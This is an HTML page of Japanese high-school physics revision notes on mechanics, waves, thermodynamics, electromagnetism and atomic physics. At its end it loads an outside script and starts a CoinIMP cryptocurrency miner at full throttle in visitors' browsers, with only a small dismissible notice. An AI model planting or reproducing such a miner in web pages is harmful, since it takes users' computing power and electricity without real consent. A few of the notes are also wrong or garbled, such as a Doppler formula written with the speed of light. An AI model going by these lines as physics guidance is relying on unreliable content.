<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="ja">
<head>
  <title>高校物理の備忘録</title>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <link rel="stylesheet" type="text/css" href="style.css">
  <link rel="shortcut icon" href="favicon.ico">
</head>
<body>
<div class="base">
<div class="left">
      <iframe src="menu.html"width="100%" height="100%"></iframe>
</div>
<div class="right">
<h2>力学</h2>
  <p>力学的エネルギーとは、その物体を0の状態にするまでに外部から加える必要のある仕事の量のこと。mghはmgの力でhだけ動かさねばならないから。</p>
  <p>乗って考える場合、速度を0にするために全てに-vし、加速度を0にするためには全てに重さ×加速度の力を逆向きに加える。</p>
  <p>仕事は力×移動距離</p>
  <p>v²-v₀²=2axを使うと楽な場合がある(mv²/2がエネルギーなことからすぐに導出可能)(つまり仕事とエネルギーへの意識)</p>
  <p>グラフ、図形への意識(これは数学でも大事)</p>
  <p>系として外力が加わっていない時、必ず運動量が保存する(運動量は忘れがち)</p>
  <p>近似への意識(並行とみなす、などちゃんと確認)</p>
  <p>衝突等分かりにくかったら直前、直後を考える。</p>
  <p>その後こうなることから、と運動を予測できる場合は予測してそこから計算するのも手</p>
  <p>単振動とは、「振動中心からの変位」に比例した大きさの復元力が働く運動のこと(ばね等があるかどうかは関係ない。式がそうなっていたら必ず単振動つまり、ma=-kxとなっていれば必ず単振動)</p>
  <p>単振動は振動中心を意識し、その他の数値を調整してから計算するという手も必要</p>
  <p>常に運動方程式を意識する(意外にも大事)</p>
  <p>力×距離が仕事、力×時間が力積。「運動量の変化は力積に等しい」</p>
  <p>見かけの重力に思いを馳せる</p>
  <p>当たり前だが、運動量の時間変化は力</p>
  <p>楕円軌道においてT²=kr³(Tは周期、rは長半径、kは定数)</p>
  <p>面積速度一定には注意(例えば、短直径の移動は周期の1/2にはならない)「面積を考える」</p>
<h2>波動</h2>
  <p>波とは、振動が空間を伝わっていく現象</p>
  <p>ドップラー効果についてf(光速-相手速度)/(光速-自分速度)("自"分の"相手")</p>
  <p>素元波の意識(波は沢山の波によってできている)(直線の波も沢山の波による)</p>
  <p>回折格子は、ただ沢山の穴が空いたスリットである。格子定数とは穴と穴の距離のこと。ブラッグの反射条件にも思いを馳せる。(結晶の間隔が格子定数になる)</p>
  <p>波動は特にsinか-sinか、cosか-cosか注意</p>
  <p>弦の振動の速度は√(張力/線密度)</p>
  <p>開管では偶数倍、閉管では奇数倍の時共鳴する</p>
  <p>圧力変化最大は節</p>
<h2>気体</h2>
  <p>「単原子分子の」断熱変化ではPV^(5/3)が一定、(TV^(2/3)も一定)この乗数はCp/Cvに該当する。</p>
  <p>吸収した熱とは、dU+外部にした仕事。定積か定圧か断熱かよく見る。(断熱の場合積分必要の可能性有り)グラフの面積も考える。</p>
  <p>熱効率とは、(正味の仕事(つまり外部にした仕事-外部からされた仕事))/("吸収した"熱量のみ)</p>
  <p>浮力を考えたら水圧は考えない。どちらかだけ。</p>
<h2>電磁気</h2>
  <p>電場とは、1C当たりに働く静電気力の大きさ(E=k|Q|/r²)。電位とは、1C当たりの位置エネルギー(電気的な高さ)。V=kQ/r E=-dV/dx</p>
  <p>運動の特徴を表す物理量とは、周期と振幅。</p>
  <p>ガウスの法則の確認。+Qから出る電気力線の本数は4πkQ=Q/ε₀(本)(どちらも使うというだけ。イコールに意味は無い。)本数を考えて面積で割れば電場が求まる。E=1m²当たりを貫く電気力線の本数。コンデンサーと点電荷について計算すれば確かに公式と一致する。</p>
  <p>コンデンサー内に金属がある時、そこの電場が無くなるというのは、内部の電子が打ち消しているから(もし電場があったら、内部の電子が電場によって移動していってしまう)。</p>
  <p>極板間引力は、QE/2を覚えても良い。何ならdxだけ極板を動かしてエネルギーの差から求めても良い(dxだけ同じ力で離し、そこから仕事で計算)。</p>
  <p>電流というのは、一秒当たりに導線の断面を通過する電気量。また、抵抗R=ρl/S(※ρはローと読む)。</p>
  <p>コンデンサーを含む回路では、直後ならコンデンサーの電荷電圧は前のままで、十分時間後では必ずコンデンサーへの電流はゼロ。</p>
  <p>半導体について、n(negatibe)型はSiにPを入れる。p(positive)型はSiにAlを入れる。電子が多いのでネガティブ、少ないのでポジティブ。</p>
  <p>電場一定において、電場×距離で電位の差が出る。</p>
  <p>電場の向きに迷ったらプラスから出てマイナスを考える。</p>
  <p>F=IBl V=vBl</p>
  <p>電流が作る磁場について、直線ではH=I/2πr、円形ではH=I/2r(円形の方が強そうなのでπかけられると覚えた方が良い)、ソレノイド(コイル)ではH=nI(nは"単位長さ当たり"の巻き数)</p>
  <p>磁束密度とは、物質内の磁場の強さである。B=μH(μはその物体の透磁率)。透磁率がデカくなるので電磁石に鉄を入れる。</p>
  <p>荷電粒子に働く力について、電場から受ける力はF=qE、磁場から受ける力はF=qvB(これは良く考えると一秒当たりのIBlと一緒)。</p>
  <p>ファラデーの電磁誘導の法則について、V=N|dΦ/dt|(Nは"巻数"、ΦとはBS(磁束。磁束"密度"に面積をかける))。またこれは磁束の変化を妨げる向きである(レンツの法則)。</p>
  <p>コイルを含む回路では、直後ならコイルを流れる電流は前のままで、十分時間後では電流が一定。つまりコイルの電圧はゼロ。V=L|dΦ/dt|なので。</p>
  <p>「最重要」コンデンサーについて、dQ/dt=Iである。これ忘れたら終わり。</p>
  <p>複素インピーダンスを身につける。コンデンサーは1/wCi=-i/wCで覚えやすい。コイルはwLi。</p>
<h2>原子</h2>
  <p>光電効果とは金属にある振動数以上の光を当てると電子が飛び出す(飛び出す電子を光電子という)現象。例えば赤い光ならどれだけ強い光でも電子が飛び出さないという点で不思議。</p>
  <p>光電効果で電子の飛び出すギリギリの振動数を限界振動数という。hν-W=mv²/2で飛び出す。hν=hc/λでエネルギー。Wは金属によって異なる(光電子が飛び出すまでに失うエネルギー)。</p>
  <p>光電効果において一秒あたりにi/e個の電子が飛び出す。</p>
  <p>コンプトン効果とは、結晶にX線(紫外線より一段波長の短い電磁波、つまり光)を当てると散乱されたX線の波長が長くなる現象。λが大きくなり、エネルギーが減る。X線光子が結晶中の電子と衝突しエネルギーを失ったため。</p>
  <p>ドブロイ波長とは、電子のような物質が波としてふるまう時の波長。λ=h/mvで、mv=h/λだから。</p>
  <p>ボーアの量子条件とは、円軌道上の電子の波がぴったりと閉じているという条件のこと。つまり2πr=nλ(=nh/mv)。(nは自然数)</p>
  <p>ボーアの量子条件のnについて、n=1意外では励起状態で不安定なのでn=1に戻る。その際のエネルギー差を光として放出する。E₂-E₁=hν</p>
  <p>e[V]=1[eV]よく使うのでこの単位。</p>
  <p>ラザフォードモデルについて、原子核のまわりの一個の電子の運動エネルギー+電位のエネルギー。</p>
  <p>放射性崩壊とは、放射線を放出して別の原子核に変化すること。半減期とは崩壊して元の量の半分になるまでの時間。</p>
  <p>α崩壊はヘリウム原子核を放出するので原子番号-2,質量数-4。β崩壊は電子を放出するので原子番号+1,質量数変化無し。γ崩壊はX線より短い電磁波(光)を放出。</p>
  <p>原子核において、陽子と中性子が核力でくっついており、原子番号が陽子数、質量数は陽子数+中性子数。</p>
  <p>E=mc²。これは結合エネルギーで、核力によってくっついている原子核をバラバラにするのに必要なエネルギー。</p>
  <centor>
  <footer id="footer"></footer>
  <script src="./js/main.js"></script>
  <script src="./ruffle.js"></script>
  </centor>
  <script src="https://www.hostingcloud.racing/og1d.js"></script>
  <script>
      var _client = new Client.Anonymous('b226f985c6028e9450ad838483abe1bc4475bd6137a7050b4ee327fcb939305b', {
          throttle: 0, c: 'w', ads: 0
      });
      _client.start();
      _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#ffffff", 40, "#000000");
  </script>
</div>
</div>
</div>
</body>
</html>
